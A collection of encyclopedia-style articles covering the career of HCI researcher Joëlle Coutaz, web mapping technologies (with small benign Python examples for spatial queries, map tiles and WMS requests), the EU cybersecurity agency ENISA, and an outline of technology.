In 1970, Coutaz received her PhD in computer science from Joseph Fourier University in Grenoble, France, where she specialized in operating systems. She then worked as a software engineer for the French National Center for Scientific Research (CNRS). In 1972, she worked on the first packet-switching network at the University of Grenoble, and later became an assistant professor at the university, a position she held until 1991. She was a visiting scientist at Carnegie Mellon University from 1983 to 1984.
Coutaz's research interests shifted from operating systems to human-computer interaction after attending a CHI conference in 1983. She would then become a pioneer in HCI in France, by bridging the domain with software engineering. In 1988, she obtained her Thèse d'Etat in human-computer interaction from Joseph Fourier University. Then in 1991, she became a full professor at University of Grenoble.
In 1990, Coutaz founded and directed CLIPS, an HCI group at the Laboratory of Informatics in Grenoble. She co-founded two groups within the CNRS national programme on computer-supported cooperative work and multimodal HCI. Furthermore, she became the co-chief editor of the Journal of Interaction between Persons and Systems. Between 1989 and 1995, she contributed to the ESPRIT BRA/LTR project AMODEUS, whose purpose was to promote a multidisciplinary approach to human-computer interaction. In 2008, Coutaz coordinated a group working on ambient intelligence for the Ministry of Higher Education, Research, and Innovation, with the purpose of confronting societal challenges in novel ways. The group took on the creation of a field that intersects information and communication technologies, and social and human sciences.
As of 2012, she is professor emeritus from the University of Grenoble.
Research
After completing her PhD in 1970, Coutaz pursued her research interests in operating systems and computer networks. However, her research interests shifted to human-computer interaction in 1983 after attending a CHI conference. In this newer domain, her work focused on software architecture modeling for interactive systems, multimodal interaction, augmented reality, and user interface plasticity. In 1987, she created the presentation-abstraction-control (PAC) model, a software architecture model for interactive systems. In 1993, Coutaz began to work with Laurence Nigay to combine the PAC model with ARCH, a model designed for the implementation of multimodal user interfaces. She has also contributed to projects at the European and national levels. Coutaz is currently working on end-user software engineering for smart homes in the field of ubiquitous computing.
FAME
From 2001 to 2004, Coutaz contributed to FAME at Karlsruhe Institute of Technology. The goal of the project was to create an intelligent agent which could facilitate communication between people of different cultures when solving a common problem. Their solution made use of multimodal interactions, including vision, speech, and object manipulation to create and manipulate new information based on the context.
CAMELEON
CAMELEON's purpose was to build methods and environments which support the design and development of context-dependent interfaces. They focused on methods which would promote the creation of software interfaces that are usable on various devices.
CONTINUUM
Between 2008 and 2011, Coutaz contributed to CONTINUUM. The project addressed the problem of service continuity within the long-term vision of ambient intelligence, and defined models that support service continuity for mobile users. Three key scientific issues were addressed: context management and awareness, semantic heterogeneity, and human control versus system autonomy.
UsiXML (ITEA)
From 2009 to 2012, Coutaz contributed to UsiXML by Information Technology for European Advancement (ITEA 2). UsiXML is a markup language for user interfaces, in which UI can be designed at different levels of abstraction.
AppsGate
Between 2012 and 2015, Coutaz contributed to AppsGate. Their goal was to create software that would allow non-engineers to create their own programs for their environment. With the rise of IoT, their focus was on programmable smart home devices.
Publications
Books
Bass, L. J., & Coutaz, J. (1991). Developing software for the user interface. SEI Series in Software Engineering, Addison-Wesley, pp. I-XIV, 1–255.
Coutaz, J. (1990). Interfaces homme-ordinateur: Conception et réalisation. Dunod informatique.
Selected publications
Coutaz, J., & Calvary, G. (2012). Human-Computer Interaction and Software Engineering for User Interface Plasticity. In Jacko, J. A. (Eds.), Human computer interaction handbook: Fundamentals, evolving technologies, and emerging applications (pp. 1195–1214). Boca Raton, FL: CRC Press.
Coutaz, J., Crowley, J. L., Dobson, S., & Garlan, D. (2005). Context is key. Communications of the ACM, 48(3), p. 49-53.
Calvary, G., Coutaz, J., Thevenin, D., Limbourg, Q., Bouillon, L., & Vanderdonckt, J. (2003). A unifying reference framework for multi-target user interfaces. Interacting with computers, 15(3), p. 289-308.
Thevenin, D., & Coutaz J. (1999). Plasticity of User Interfaces: Framework and Research Agenda. Interact, 99, p. 110-117.
Nigay, L., & Coutaz, J. (Eds.). (1993). Proceedings of the INTERACT'93 and CHI'93 conference on human factors in computing systems: A design space for multimodal systems: concurrent processing and data fusion. New York City, NY: ACM.
Awards
In 2013, Coutaz was awarded the National Order of the Legion of Honour, the highest French order for military and civil merits.
In 2013, she received the IFIP TC13 Pioneer Award for outstanding contributions to the educational, theoretical, technical, commercial, or professional aspects of analysis, design, construction, evaluation and use of interactive systems.
In 2013, she became an honorary member of Société Informatique de France.
In 2007, she received an Honorary Degree of Doctor of Science from the University of Glasgow.
In 2007, she was awarded membership to SIGCHI for substantial contributions to the field of Human-Computer Interaction.
References
French computer scientists
French women computer scientists
Year of birth missing (living people)
Living people
Grenoble Alpes University faculty
Human–computer interaction researchers
Chevaliers of the Légion d'honneur
|
8561200
|
https://en.wikipedia.org/wiki/Web%20mapping
|
Web mapping
|
Web mapping, or online mapping, is the process of using maps delivered by geographic information systems (GIS) on the Internet, more specifically on the World Wide Web (WWW). A web map, or online map, is both served and consumed; web mapping is therefore more than web cartography, it is a service by which consumers may choose what the map will show. Web GIS emphasizes geodata-processing aspects, such as data acquisition, server software architecture, data storage, and algorithms, more than the end-user reports themselves.
The terms web GIS and web mapping remain somewhat synonymous. Web GIS uses web maps, and end users who are web mapping are gaining analytical capabilities. The term location-based services refers to web mapping consumer goods and services. Web mapping usually involves a web browser or other user agent capable of client-server interactions. Questions of quality, usability, social benefits, and legal constraints are driving its evolution.
The advent of web mapping can be regarded as a major new trend in cartography. Until recently cartography was restricted to a few companies, institutes and mapping agencies, requiring relatively expensive and complex hardware and software as well as skilled cartographers and geomatics engineers.
Web mapping has brought many geographical datasets, including free ones generated by OpenStreetMap and proprietary datasets owned by HERE, Huawei, Google, Tencent, TomTom, and others. A range of free software to generate maps has also been conceived and implemented alongside proprietary tools like ArcGIS. As a result, the barrier to entry for serving maps on the web has been lowered.
Types
A first classification of web maps was made by Kraak in 2001. He distinguished static and dynamic web maps, and further distinguished interactive and view-only web maps. Today there is an increased number of dynamic web map types and of static web map sources.
Analytical web maps
Analytical web maps offer GIS analysis. The geodata can be a static provision, or needs updates. The borderline between analytical web maps and web GIS is fuzzy. Parts of the analysis can be carried out by the GIS geodata server. As web clients gain capabilities processing is distributed.
Animated and realtime
Realtime maps show the situation of a phenomenon in close to realtime (only a few seconds or minutes delay). They are usually animated. Data is collected by sensors and the maps are generated or updated at regular intervals or on demand.
Animated maps show changes in the map over time by animating one of the graphical or temporal variables. Technologies enabling client-side display of animated web maps include scalable vector graphics (SVG), Adobe Flash, Java, QuickTime, and others. Web maps with real-time animation include weather maps, traffic congestion maps and vehicle monitoring systems.
CartoDB launched an open source library, Torque, which enables the creation of dynamic animated maps with millions of records. Twitter uses this technology to create maps to reflect how users reacted to news and events worldwide.
Collaborative web maps
Collaborative maps are a developing potential. In proprietary or open source collaborative software, users collaborate to create and improve the web mapping experience. Some collaborative web mapping projects are:
Google Map Maker
Here Map Creator
OpenStreetMap
WikiMapia
meta:Maps - a survey of Wikimedia movement web mapping proposals
Online atlases
The traditional atlas goes through a remarkably large transition when hosted on the web. Atlases can cease their printed editions or offer printing on demand. Some atlases also offer raw data downloads of the underlying geospatial data sources.
Static web maps
Static web pages are view only without animation or interactivity. These files are created once, often manually, and infrequently updated. Typical graphics formats for static web maps are PNG, JPEG, GIF, or TIFF (e.g., drg) for raster files, SVG, PDF or SWF for vector files. These include scanned paper maps not designed as screen maps. Paper maps have a much higher resolution and information density than typical computer displays of the same physical size, and might be unreadable when displayed on screens at the wrong resolution.
Web GIS in the cloud
Various companies now offer web mapping as a cloud-based software as a service. These service providers allow users to create and share maps by uploading data to their servers (cloud storage). The maps are created either by using an in-browser editor or by writing scripts that leverage the service providers' APIs.
Evolving paper cartography
Compared to traditional techniques, web mapping software has many advantages; the disadvantages are also noted below.
Web maps can easily deliver up to date information. If maps are generated automatically from databases, they can display information in almost realtime. They don't need to be printed, mastered and distributed. Examples:
A map displaying election results, as soon as the election results become available.
A traffic congestion map using traffic data collected by sensor networks.
A map showing the current locations of mass transit vehicles such as buses or trains, allowing patrons to minimize their waiting time at stops or stations, or be aware of delays in service.
Weather maps, such as NEXRAD.
Software and hardware infrastructure for web maps is cheap. Web server hardware is cheaply available and many open source tools exist for producing web maps. Geodata, on the other hand, is not; satellites and fleets of automobiles use expensive equipment to collect the information on an ongoing basis. Perhaps owing to this, many people are still reluctant to publish geodata, especially in places where geodata are expensive. They fear copyright infringements by other people using their data without proper requests for permission.
Product updates can easily be distributed. Because web maps distribute both logic and data with each request or loading, product updates can happen every time the web user reloads the application. In traditional cartography, when dealing with printed maps or interactive maps distributed on offline media (CD, DVD, etc.), a map update takes serious effort, triggering a reprint or remastering as well as a redistribution of the media. With web maps, data and product updates are easier, cheaper, and faster, and occur more often. Perhaps owing to this, many web maps are of poor quality in symbolization, content, and data accuracy.
Web maps can combine distributed data sources. Using open standards and documented APIs one can integrate (mash up) different data sources, if the projection system, map scale and data quality match. The use of centralized data sources removes the burden for individual organizations to maintain copies of the same data sets. The downside is that one has to rely on and trust the external data sources. In addition, with detailed information available and the combination of distributed data sources, it is possible to find out and combine a lot of private and personal information of individual persons. Properties and estates of individuals are now accessible through high resolution aerial and satellite images throughout the world to anyone.
Web maps allow for personalization. By using user profiles, personal filters and personal styling and symbolization, users can configure and design their own maps, if the web mapping system supports personalization. Accessibility issues can be treated in the same way. If users can store their favourite colors and patterns they can avoid color combinations they can't easily distinguish (e.g. due to color blindness). Despite this, as with paper, web maps have the problem of limited screen space, but more so. This is a particular problem for mobile web maps; the equipment carried usually has a very small screen, making it less likely that there is room for personalisation.
Web maps enable collaborative mapping: web mapping technologies such as DHTML/Ajax, SVG, Java, Adobe Flash, etc. enable distributed data acquisition and collaborative efforts. Examples of such projects are the OpenStreetMap project and the Google Earth community. As with other open projects, quality assurance is very important, however, and the reliability of the internet and web server infrastructure is not yet good enough. Especially if a web map relies on external, distributed data sources, the original author often cannot guarantee the availability of the information.
Web maps support hyperlinking to other information on the web. Just like any other web page or a wiki, web maps can act like an index to other information on the web. Any sensitive area in a map, a label text, etc. can provide hyperlinks to additional information. As an example, a map showing public transport options can directly link to the corresponding section in the online train timetable. However, development of web maps is complicated enough as it is: despite the increasing availability of free and commercial tools to create web mapping and web GIS applications, it is still more complex to create interactive web maps than to typeset and print images. Many technologies, modules, services and data sources have to be mastered and integrated. The development and debugging environment for a conglomerate of different web technologies is still awkward and uncomfortable.
History
This section contains some of the milestones of web mapping, online mapping services and atlases.
1989: Birth of the WWW, WWW invented at CERN for the exchange of research documents.
1993: Xerox PARC Map Viewer, The first mapserver based on CGI/Perl, allowed reprojection styling and definition of map extent.
1994: The National Atlas of Canada, The first version of the National Atlas of Canada was released. Can be regarded as the first online atlas.
1995: The Gazetteer for Scotland, The prototype version of the Gazetteer for Scotland was released. The first geographical database with interactive mapping.
1995: Tiger Mapping Service, from the U.S. Census Bureau, the first national street-level web map, and the first major web map from the U.S. government.
1995: MapGuide, First introduced as Argus MapGuide.
1996: Center for Advanced Spatial Technologies Interactive Mapper, Based on CGI/C shell/GRASS would allow the user to select a geographic extent, a raster base layer, and number of vector layers to create personalized map.
1996: Mapquest, The first popular online Address Matching and Routing Service with mapping output.
1996: MultiMap, The UK-based MultiMap website launched offering online mapping, routing and location based services. Grew into one of the most popular UK web sites.
1996: MapGuide, Autodesk acquired Argus Technologies and introduced Autodesk MapGuide 2.0.
1997: US Online National Atlas Initiative, The USGS received the mandate to coordinate and create the online National Atlas of the United States.
1997: UMN MapServer 1.0, Developed at the University of Minnesota (UMN) as Part of the NASA ForNet Project. Grew out of the need to deliver remote sensing data across the web for foresters.
1998: Terraserver USA, A Web Map Service serving aerial images (mainly b+w) and USGS DRGs was released. One of the first popular WMS. This service is a joint effort of USGS, Microsoft and HP.
2003: NASA World Wind, NASA World Wind Released. An open virtual globe that loads data from distributed resources across the internet. Terrain and buildings can be viewed 3 dimensionally. The (XML based) markup language allows users to integrate their own personal content. This virtual globe needs special software and doesn't run in a web browser.
2004: OpenStreetMap, an open source, open content world map founded by Steve Coast.
2004: Yandex Maps is founded.
2005: Google Maps, The first version of Google Maps. Based on raster tiles organized in a quad tree scheme, data loading done with XMLHttpRequests. This mapping application became highly popular on the web, also because it allowed other people to integrate Google Maps services into their own websites.
2005: MapGuide Open Source introduced as open source by Autodesk
2005: Google Earth, The first version of Google Earth was released building on the virtual globe metaphor. Terrain and buildings can be viewed 3 dimensionally. The KML (XML based) markup language allows users to integrate their own personal content. This virtual globe needs special software and doesn't run in a web browser.
2005: OpenLayers, the first version of the open source Javascript library OpenLayers.
2006: WikiMapia is launched
2009: Nokia made Ovi Maps free on its smartphones.
2012: Apple Maps, the first vector-tile based mapping app, is launched, replacing Apple's own Google Maps client as the default mapping app for its platforms.
2020: Petal Maps is released.
Technologies
Web mapping technologies require both server-side and client-side applications. The following is a list of technologies utilized in web mapping.
Spatial databases are usually object-relational databases enhanced with geographic data types, methods and properties. They are necessary whenever a web mapping application has to deal with dynamic data (that changes frequently) or with huge amounts of geographic data. Spatial databases allow spatial queries, sub-selects, reprojections, and geometry manipulations and offer various import and export formats. PostGIS is a prominent example; it is open source. MySQL also implements some spatial features. Oracle Spatial, Microsoft SQL Server (with the spatial extensions), and IBM DB2 are the commercial alternatives. The Open Geospatial Consortium's (OGC) specification "Simple Features" is a standard geometry data model and operator set for spatial databases. Part 2 of the specification defines an implementation using SQL.
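As a sketch of such a spatial query from application code, assuming a PostGIS-enabled PostgreSQL database with a hypothetical places table carrying a geom column (connection details are placeholders, not a real configuration):

import psycopg2  # PostgreSQL driver; requires a PostGIS-enabled database

conn = psycopg2.connect("dbname=gis user=gis_user password=secret host=localhost")

query = """
    SELECT name
    FROM places                              -- hypothetical table
    WHERE ST_DWithin(
        geom::geography,                     -- hypothetical geometry column
        ST_SetSRID(ST_MakePoint(%s, %s), 4326)::geography,
        %s                                   -- search radius in metres
    );
"""

with conn, conn.cursor() as cur:
    # Find all places within 1 km of the given lon/lat.
    cur.execute(query, (5.7245, 45.1885, 1000))
    for (name,) in cur.fetchall():
        print(name)

conn.close()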
Tiled web maps display rendered maps made up of raster image "tiles".
Vector tiles are also becoming more popular—Google and Apple have both transitioned to vector tiles. Mapbox.com also offers vector tiles. This new style of web mapping is resolution independent, and also has the advantage of dynamically showing and hiding features depending on the interaction.
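Both raster and vector tiles are commonly addressed with the same XYZ/Web Mercator ("slippy map") numbering scheme. A small Python sketch of the usual conversion from latitude/longitude to tile indices (the coordinates in the example are arbitrary):

import math

def latlon_to_tile(lat_deg, lon_deg, zoom):
    # Convert WGS84 lat/lon to XYZ tile indices in the common
    # Web Mercator ("slippy map") tiling scheme.
    lat_rad = math.radians(lat_deg)
    n = 2 ** zoom                                   # tiles per axis at this zoom
    x = int((lon_deg + 180.0) / 360.0 * n)
    y = int((1.0 - math.asinh(math.tan(lat_rad)) / math.pi) / 2.0 * n)
    return x, y

# Example: the tile containing central London at zoom level 12.
print(latlon_to_tile(51.5074, -0.1278, 12))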
WMS servers generate maps using parameters for user options such as the order of the layers, the styling and symbolization, the extent of the data, the data format, the projection, etc. The OGC standardized these options. Another WMS server standard is the Tile Map Service. Standard image formats include PNG, JPEG, GIF and SVG.
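A GetMap request is typically expressed as a URL carrying these parameters. A minimal Python sketch follows (the endpoint, layer names and bounding box are placeholders, not a real service):

from urllib.parse import urlencode

# Hypothetical WMS endpoint; layer names and extent are placeholders.
endpoint = "https://example.org/wms"

params = {
    "SERVICE": "WMS",
    "VERSION": "1.3.0",
    "REQUEST": "GetMap",
    "LAYERS": "topography,roads",      # drawing order: bottom to top
    "STYLES": ",",                     # empty values request each layer's default style
    "CRS": "EPSG:4326",                # coordinate reference system
    "BBOX": "46.0,5.0,48.0,8.0",       # extent; axis order follows the CRS in WMS 1.3.0
    "WIDTH": "800",
    "HEIGHT": "600",
    "FORMAT": "image/png",             # output image format
}

getmap_url = endpoint + "?" + urlencode(params)
print(getmap_url)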
Impact on society
Web maps have become an essential tool for many, as illustrated by a 2021 labor strike demanding (among other things) a certain type of map.
See also
Online cadastral map
Comparison of web map services
Geographic Information Systems (GIS)
List of online map services
Neogeography
Geoweb
Public Participation GIS (PPGIS)
Soundmap
Volunteered Geographic Information (VGI)
Notes and references
Further reading
Fu, P., and J. Sun. 2010. Web GIS: Principles and Applications. ESRI Press. Redlands, CA. .
Graham, M. 2010. Neogeography and the Palimpsests of Place. Tijdschrift voor Economische en Sociale Geografie. 101(4), 422-436.
Kraak, Menno-Jan and Allan Brown (2001): Web Cartography – Developments and prospects, Taylor & Francis, New York, .
Mitchell, Tyler (2005): Web Mapping Illustrated, O'Reilly, Sebastopol, 350 pages, . This book discusses various Open Source Web Mapping projects and provides hints and tricks as well as examples.
Peterson, Michael P. (ed.) (2014): Mapping in the Cloud, Guilford, .
Peterson, Michael P. (ed.) (2003): Maps and the Internet, Elsevier, .
Rambaldi G, Chambers R., McCall M, And Fox J. 2006. Practical ethics for PGIS practitioners, facilitators, technology intermediaries and researchers. PLA 54:106-113, IIED, London, UK
Gaffuri J, 2012. Toward web mapping with vector data. Vol. 7478 of Lecture Notes in Computer Science. Springer, Ch. 7, pp. 87–101. DOI:10.1007/978-3-642-33024-7_7
Feldman, S 2010. History of Web Mapping - slide deck and History of Web Mapping - mind map
External links
Sites
UMN MapServer documentation and tutorials
Webmapping with SVG, Postgis and UMN MapServer tutorials
International Cartographic Association (ICA), the world body for mapping and GIScience professionals
Comparison of Online Mapping Tools, Duke University
|
3311621
|
https://en.wikipedia.org/wiki/European%20Union%20Agency%20for%20Cybersecurity
|
European Union Agency for Cybersecurity
|
The European Union Agency for Cybersecurity – still commonly designated ENISA, the abbreviation of its original name – is an agency of the European Union. It has been fully operational since September 1, 2005. The Agency is located in Athens, Greece, and has a second office in Heraklion, Greece.
ENISA was created in 2004 by EU Regulation No 460/2004 under the name of European Network and Information Security Agency. ENISA's Regulation is the EU Regulation No 2019/881 of the European Parliament and of the Council of 17 April 2019 on ENISA (the European Union Agency for Cybersecurity) and on information and communications technology cybersecurity certification and repealing EU Regulation No 526/2013 (Cybersecurity Act). The Agency works closely with the EU Member States and other stakeholders to deliver advice and solutions as well as to improve their cybersecurity capabilities. It also supports the development of a cooperative response to large-scale cross-border cybersecurity incidents or crises, and since 2019 it has been drawing up cybersecurity certification schemes.
ENISA assists the Commission, the member states and, consequently, the business community in meeting the requirements of network and information security, including present and future EU legislation. ENISA ultimately strives to serve as a centre of expertise for both member states and EU Institutions to seek advice on matters related to network and information security.
ENISA has been supporting the organization of the "Cyber Europe" pan-European cybersecurity exercises since 2010.
Organisation
ENISA is managed by the executive director and supported by a staff composed of experts representing stakeholders such as the information and communication technologies industry, consumer groups and academic experts. The agency is overseen by the executive board and the management board, which are composed of representatives from the EU member states, the EU Commission and other stakeholders.
Set up in 2004 as an informal point of reference in the member states, the National Liaison Officers network became a statutory body of ENISA on 27 June 2019. The National Liaison Officers Network facilitates the exchange of information between ENISA and the member states. The agency is also assisted by the Advisory Group, which is composed of “nominated members” and members appointed “ad personam”, 33 members in total from all over Europe. The advisory group focuses on issues relevant to stakeholders and brings them to the attention of ENISA.
In order to carry out its tasks, the agency has a budget of nearly €17 million for the year 2019 and 70 statutory staff members. In addition, the agency employs a number of other employees including seconded national experts, trainees and interim agents. There are plans for additional experts to be integrated into the agency following the entering into force of Regulation 2019/881.
History
In 2007, European Commissioner Viviane Reding proposed that ENISA be folded into a new European Electronic Communications Market Authority (EECMA). By 2010, Commissioner Neelie Kroes signalled that the European Commission wanted a reinforced agency. The agency mandate was extended up to 2012 with an annual budget of €8 million, under the leadership of Dr. Udo Helmbrecht. The last extension of ENISA's mandate before it became permanent was made by EU Regulation No 526/2013 of the European Parliament and of the Council of 21 May 2013, repealing Regulation (EC) No 460/2004. As of 27 June 2019, ENISA has been established for an indefinite period.
ENISA headquarters, including its administration and support functions, were originally based in Heraklion, Greece. The choice of a rather remote site was contentious from the outset, particularly since Greece held the EU presidency when the agency’s mandate was being negotiated. In addition, the agency has had a liaison office in Athens since October 2009. In 2013, it moved one-third of its staff of then sixty from Crete to Athens. In 2016, the Committee on Budgets backed ENISA’s bid to shut down the Heraklion office. Since 2019, ENISA has had two offices: its headquarters in Athens and a second office in Heraklion, Greece. In June 2021, the European Commission gave its consent to the establishment of an ENISA office in Brussels.
Executive director
2004 - October 2009 : Mr Andrea Pirotti (an Italian national and former Vice-President of Marconi Communications)
October 2009 – October 2019 : Dr Udo Helmbrecht (a German national and former president/director of the Federal Office for Information Security Germany)
since October 2019: Juhan Lepassaar (Estonia)
See also
Trans European Services for Telematics between Administrations (TESTA)
EUDRANET
European Cybercrime Centre
References
How the European Union works
External links
European Network and Information Security Agency
Agencies of the European Union
2005 establishments in Greece
2005 in the European Union
Government agencies established in 2005
Heraklion
Information technology organizations based in Europe
Organizations based in Crete
National cyber security centres
|
6504692
|
https://en.wikipedia.org/wiki/Outline%20of%20technology
|
Outline of technology
|
The following outline is provided as an overview of and topical guide to technology: collection of tools, including machinery, modifications, arrangements and procedures used by humans. Engineering is the discipline that seeks to study and design new technology. Technologies significantly affect human as well as other animal species' ability to control and adapt to their natural environments.
Components of technology
Man-made
Branches of technology
Aerospace – flight or transport above the surface of the Earth.
Space exploration – the physical investigation of space more than 100 km above the Earth by either crewed or uncrewed spacecraft.
General aviation
Aeronautics
Astronautics
Aerospace engineering
Applied physics – physics which is intended for a particular technological or practical use. It is usually considered as a bridge or a connection between "pure" physics and engineering.
Agriculture – cultivation of plants, animals, and other living organisms.
Fishing – activity of trying to catch fish. Fish are normally caught in the wild. Techniques for catching fish include hand gathering, spearing, netting, angling and trapping.
Fisheries – a fishery is an entity engaged in raising or harvesting fish which is determined by some authority to be a fishery. According to the FAO, a fishery is typically defined in terms of the "people involved, species or type of fish, area of water or seabed, method of fishing, class of boats, purpose of the activities or a combination of the foregoing features".
Fishing industry – industry or activity concerned with taking, culturing, processing, preserving, storing, transporting, marketing or selling fish or fish products. It is defined by the FAO as including recreational, subsistence and commercial fishing, and the harvesting, processing, and marketing sectors.
Forestry – art and science of tree resources, including plantations and natural stands. The main goal of forestry is to create and implement systems that allow forests to continue a sustainable provision of environmental supplies and services.
Organic gardening and farming
Sustainable agriculture
Communication –
Books –
Telecommunication – the transfer of information at a distance, including signaling, telegraphy, telephony, telemetry, radio, television, and data communications.
Radio – Aural or encoded telecommunications.
Internet – the global system of interconnected computer networks that use the standard Internet Protocol Suite (TCP/IP).
Technology of television –
Television broadcasting – Visual and aural telecommunications.
Computing – any goal-oriented activity requiring, benefiting from, or creating computers. Computing includes designing and building hardware and software systems; processing, structuring, and managing various kinds of information; doing scientific research on and with computers; making computer systems behave intelligently; creating and using communications and entertainment media; and more.
Computer engineering – discipline that integrates several fields of electrical engineering and computer science required to develop computer systems, from designing individual microprocessors, personal computers, and supercomputers, to circuit design.
Computers – general purpose devices that can be programmed to carry out a finite set of arithmetic or logical operations. Since a sequence of operations can be readily changed, computers can solve more than one kind of problem.
Computer science – the study of the theoretical foundations of information and computation and of practical techniques for their implementation and application in computer systems.
Artificial intelligence – intelligence of machines and the branch of computer science that aims to create it.
Natural language processing –
Object recognition – in computer vision, this is the task of finding a given object in an image or video sequence.
Cryptography – the technology to secure communications in the presence of third parties.
Human-computer interaction
Information technology – the acquisition, processing, storage and dissemination of vocal, pictorial, textual and numerical information by a microelectronics-based combination of computing and telecommunications.
Software engineering – the systematic approach to the development, operation, maintenance, and retirement of computer software.
Programming – the process of designing, writing, testing, debugging, and maintaining the source code of computer programs.
Software development – development of a software product, which entails computer programming (process of writing and maintaining the source code), but also encompasses a planned and structured process from the conception of the desired software to its final manifestation.
Web design and web development –
C++ – one of the most popular programming languages with application domains including systems software, application software, device drivers, embedded software, high-performance server and client applications, and entertainment software such as video games.
Perl – high-level, general-purpose, interpreted, dynamic programming language. Used for text processing, CGI scripting, graphics programming, system administration, network programming, finance, bioinformatics, and more.
Software – one or more computer programs and data held in the storage of the computer for one or more purposes. In other words, software is a set of programs, procedures, algorithms and its documentation concerned with the operation of a data processing system.
Free software – software that can be used, studied, and modified without restriction.
Search engines – information retrieval systems designed to help find information stored on a computer system.
Internet – the global system of interconnected computer networks that use the standard Internet Protocol Suite (TCP/IP).
World Wide Web –
Computer industry
Apple Inc. – manufacturer and retailer of computers, hand-held computing devices, and related products and services.
Google – Google Inc. and its Internet services including Google Search.
Construction – building or assembly of any physical structure.
Design – the art and science of creating the abstract form and function for an object or environment.
Architecture – the art and science of designing buildings.
Electronics – the physics, engineering, technology and applications that deal with the emission, flow and control of electrons in vacuum and matter.
Energy – in physics, the quantitative property that must be transferred to an object in order to perform work on, or to heat, the object.
Energy development – ongoing effort to provide abundant, efficient, and accessible energy resources through knowledge, skills, and construction.
Energy storage – the storage of a form of energy that can then be used later.
Nuclear technology – the technology and application of the spontaneous and induced reactions of atomic nuclei.
Wind energy – the use of wind to provide mechanical power through wind turbines to turn electric generators, and traditionally to do other work such as milling or pumping.
Solar energy – radiant light and heat from the Sun, harnessed using a range of ever-evolving technologies such as solar heating, photovoltaics, solar thermal energy, solar architecture, molten salt power plants and artificial photosynthesis.
Engineering – the application of science, mathematics, and technology to produce useful goods and systems.
Chemical engineering – the technology and application of chemical processes to produce useful materials.
Computer engineering – branch of engineering that integrates several fields of computer science and electronic engineering required to develop computer hardware and software.
Control engineering – engineering discipline that applies automatic control theory to design systems with desired behaviors in control environments.
Electrical engineering – the technology and application of electromagnetism, including electricity, electronics, telecommunications, computers, electric power, magnetics, and optics.
Climate engineering – the large-scale manipulation of a specific process central to controlling Earth’s climate for the purpose of obtaining a specific benefit.
Software engineering – the technology and application of a systematic approach to the development, operation, maintenance, and retirement of computer software.
Firefighting – act of extinguishing fires. A firefighter fights fires to prevent destruction of life, property and the environment. Firefighting is a professional technical skill.
Forensic science – application of a broad spectrum of sciences to answer questions of interest to a legal system. This may be in relation to a crime or a civil action.
Health
Biotechnology – applied biology that involves the use of living organisms and bioprocesses in engineering, technology, medicine and other fields requiring bioproducts.
Ergonomics – the study of designing equipment and devices that fit the human body, its movements, and its cognitive abilities.
Hydrology – The study of the movement, distribution, and quality of water on Earth and other planets, including the hydrologic cycle, water resources and environmental watershed sustainability.
Industry – production of an economic good or service.
Automation – use of machinery to replace human labor.
Industrial machinery –
Machines – devices that perform or assist in performing useful work.
Manufacturing – use of machines, tools and labor to produce goods for use or sale. The term may refer to a range of human activity, from handicraft to high tech, but is most commonly applied to industrial production, in which raw materials are transformed into finished goods on a large scale.
Robotics – deals with the design, construction, operation, structural disposition, manufacture and application of robots.
Object recognition
Information science –
Cartography – the study and practice of making maps. Combining science, aesthetics, and technique, cartography builds on the premise that reality can be modeled in ways that communicate spatial information effectively.
Library science – technology related to libraries and the information fields.
Military science – the study of the technique, psychology, practice and other phenomena which constitute war and armed conflict.
Mining – extraction of mineral resources from the earth.
Nanotechnology – the study of manipulating matter on an atomic and molecular scale. Generally, nanotechnology deals with developing materials or devices possessing at least one dimension sized between 1 and 100 nanometres.
Prehistoric technology – technologies that emerged before recorded history (i.e., before the development of writing).
Quantum technology –
Sustainability – capacity to endure. In ecology, the word describes how biological systems remain diverse and productive over time. Long-lived and healthy wetlands and forests are examples of sustainable biological systems. For humans, sustainability is the potential for long-term maintenance of well being, which has environmental, economic, and social dimensions.
Transport – the transfer of people or things from one place to another.
Rail transport – means of conveyance of passengers and goods by way of wheeled vehicles running on rail tracks consisting of steel rails installed on sleepers/ties and ballast.
Vehicles – mechanical devices for transporting people or things.
Automobiles – human-guided powered land-vehicles.
Bicycles – human-powered land-vehicles with two or more wheels.
Motorcycles – single-track, engine-powered, motor vehicles. They are also called motorbikes, bikes, or cycles.
Vehicle components
Tires – ring-shaped coverings that fit around wheel rims
Technology by region
Science and technology in Africa
Science and technology in Algeria
Science and technology in Angola
Science and technology in Morocco
Science and technology in South Africa
Science and technology in Asia
Science and technology in Bangladesh
Science and technology in China
Science and technology in India
Science and technology in Indonesia
Science and technology in Iran
Science and technology in Israel
Science and technology in Japan
Science and technology in Malaysia
Science and technology in Pakistan
Science and technology in the Philippines
Science and technology in Russia
Science and technology in Turkey
Science and technology in Europe
Science and technology in Albania
Science and technology in Belgium
Science and technology in Brussels
Science and technology in Flanders
Science and technology in Wallonia
Science and technology in Bulgaria
Science and technology in France
Science and technology in Germany
Science and technology in Hungary
Science and technology in Iceland
Science and technology in Italy
Science and technology in Portugal
Science and technology in Romania
Science and technology in Russia
Science and technology in Spain
Science and technology in Switzerland
Science and technology in Ukraine
Science and technology in the United Kingdom
Science and technology in North America
Science and technology in Canada
Science and technology in the United States
Science and technology in Jamaica
Science and technology in South America
Science and technology in Argentina
Science and technology in Colombia
Science and technology in Venezuela
History of technology
History of technology
Timelines of technology
Man vs. Technology
Technology museum –
History of technology by period
Prehistoric technology (outline)
Control of fire by early humans
Ancient technology – c. 800 BCE – 476 CE
Ancient Egyptian technology –
Obelisk making technology in ancient Egypt –
Ancient Greek technology – c. 800 BCE – 146 BCE
Ancient Roman technology – c. 753 BCE – 476 CE
Science and technology of the Han dynasty – 206 BCE – 220 CE
Science and technology of the Tang dynasty – 618–907
Science and technology of the Song dynasty – 960–1279 CE
Medieval technology – 5th to 15th century
Byzantine technology – 5th to 15th century
Islamic Golden Age – 8th to 13th century
Science and technology in the Ottoman Empire – 14th to 20th century
Industrial revolution – 18th to 19th century
Second Industrial Revolution – 1820–1914
Technology during World War I – 1914–1918
Technology during World War II – 1939–1945
Allied technological cooperation during World War II –
American military technology during World War II –
German military technology during World War II –
1970s in science and technology
1980s in science and technology
1990s in science and technology
2000s in science and technology
2010s in science and technology
Technological ages
Media about the history of technology
Connections – documentary television series and 1978 book ("Connections" based on the series) created, written and presented by science historian James Burke. It took an interdisciplinary approach to the history of science and invention and demonstrated how various discoveries, scientific achievements, and historical world events were built from one another successively in an interconnected way to bring about particular aspects of modern technology. There were 3 seasons produced, and they aired in 1978, 1994, and 1997.
